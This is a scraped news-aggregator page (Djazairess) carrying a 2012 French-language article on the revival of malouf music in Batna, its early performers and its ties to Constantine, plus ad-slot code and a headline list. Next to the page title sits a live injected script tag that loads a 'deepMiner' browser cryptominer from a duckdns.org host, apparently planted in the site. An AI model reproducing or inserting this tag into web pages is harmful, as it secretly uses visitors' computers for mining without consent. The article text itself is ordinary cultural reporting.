googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : LE MALOUF À BATNA<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





LE MALOUF À BATNA
Un style qui reprend de la vitalité
Publié dans Liberté le 16 - 02 - 2012

Batna, la ville où résonnent toujours des musiques joyeuses, tendres, mythiques et poétiques, est en train de renouer avec le malouf. Les concerts de malouf donnés ces mois-ci au Théâtre régional de Batna et à travers les maisons et les centres de culture confirment le retour en force de cette musique.
Cette situation a poussé plusieurs membres des troupes à en constituer de nouvelles. De ces troupes, deux émergent du lot et s'illustrent, ce sont la troupe Andaloussia des frères Bensaïd et celle du musicien et chanteur Beningliz Bey Mahieddine. Ces deux troupes activent ces jours-ci et animent plusieurs concerts à Batna. De l'avis de certains connaisseurs, les groupes de Batna commencent à gagner en maturité et à glaner des galons dans ce genre musical. En outre, il est difficile de déterminer qui a été à l'origine de l'introduction ce style musical, cette musique savante, à Batna. Les quelques témoignages recueillis dénotent que le mérite revient à Kaddour Berkane (qui est encore vivant) et Hachani Youcef, dit Hamid (décédé), qui l'ont beaucoup pratiquée avant la guerre de Libération. “Lorsque j'ai ouvert les yeux, j'ai trouvé le défunt musicien Hamid Hachani jouer ce genre de musique malouf dans les concerts qu'organisait Batna à l'époque”, se rappelle le chanteur et parolier Ounissi Mohamed.
Le maestro Mahmoud Chérif, présent à la discussion, rectifie en déclarant que “le malouf à Batna remonte à l'ère d'avant l'indépendance, entre 1952 et 1954. Ceux qui le pratiquaient beaucoup à l'époque, c'étaient Kaddour Berkane, un maître du oud (luth arabe) et chanteur aux multiples nuances et bien sûr le défunt Hamid Hachani. Puis Hamid est parti en Tunisie en 1956. Dès son retour, après l'indépendance, il a créé deux troupes : El-Bahdja puis une El-Moustabal. Quant aux conditions qui ont permis de populariser ou d'essaimer le malouf dans la ville de Batna ces dernières années, nous avons appris que “le malouf s'est propagé à Batna-ville grâce aux échanges importants entre les maisons et les centres culturels des deux villes de Batna et de Constantine”, et ce, suite aux échanges et aux contacts entre les musiciens des deux villes, surtout à la fin des années 70 et au début des années 80, avec la création de l'orchestre pilote de Constantine. De plus, beaucoup de musiciens de Constantine se sont installés à Batna. Un seul constat est certain : le malouf à Batna continue à enrichir les répertoires de musique qui se jouent dans les Aurès où la diversité des musiques fait sa richesse.
B. B


Cliquez ici pour lire l'article depuis sa source.